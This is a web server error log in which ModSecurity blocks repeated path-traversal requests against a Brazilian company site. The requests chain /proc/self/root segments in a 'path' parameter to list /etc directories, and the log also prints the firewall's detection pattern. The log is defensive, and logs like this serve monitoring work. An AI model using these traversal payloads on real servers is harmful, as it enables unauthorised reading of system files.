[Wed Mar 18 05:47:35.419452 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.243.128:51370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmp-w_le52K8_3pV2uhQAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:47:36.851432 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:51382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmqOoXxyEfFpUF8f86SQAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:47:38.164191 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.243.128:51392] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmqimAPhZkrhU8w4k8RwAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:47:39.546395 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.243.128:35108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmq-w_le52K8_3pV2uiAAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:47:44.261430 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.243.128:35120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmsOoXxyEfFpUF8f86UAAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:47:47.845535 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:35124] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpms9Y0UrI5A3LftIxkGgAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:47:50.344998 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.243.128:35138] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmtsdf6f5d65gmYZSfcgAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:47:52.856226 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.243.128:51266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmt9Y0UrI5A3LftIxkHQAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:47:54.161272 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.243.128:51274] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmuuw_le52K8_3pV2ujAAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:47:55.475160 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.243.128:51288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmuwkwaGbbGflqUZDetgAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:47:56.871525 2026] [:error] [pid 29882:tid 140411691570944] [client 74.7.243.128:51302] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmvEzinOy1jxa1j4ff3AAAAQY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:47:59.409130 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:51310] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmvwkwaGbbGflqUZDeugAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:48:04.374305 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.243.128:53636] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmxOw_le52K8_3pV2ukwAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:48:09.526966 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:53648] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmyda6ubjKNq_cu4ZjjQAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:48:12.305375 2026] [:error] [pid 15051:tid 140411691570944] [client 74.7.243.128:33354] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmzCmAPhZkrhU8w4k8UAAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:48:13.813977 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:33358] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmzfu8EFLIOrSqIpvTmgAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:48:13.881229 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:55828] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpmzcdf6f5d65gmYZSfeAAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:48:27.400597 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:33362] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpm28df6f5d65gmYZSflAAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:48:27.944153 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.241.31:55844] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpm28df6f5d65gmYZSflQAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:48:30.001132 2026] [:error] [pid 15051:tid 140411557287680] [client 74.7.243.128:54046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpm3SmAPhZkrhU8w4k8VwAAAJY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:48:33.669104 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:48598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpm4QkwaGbbGflqUZDe0AAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
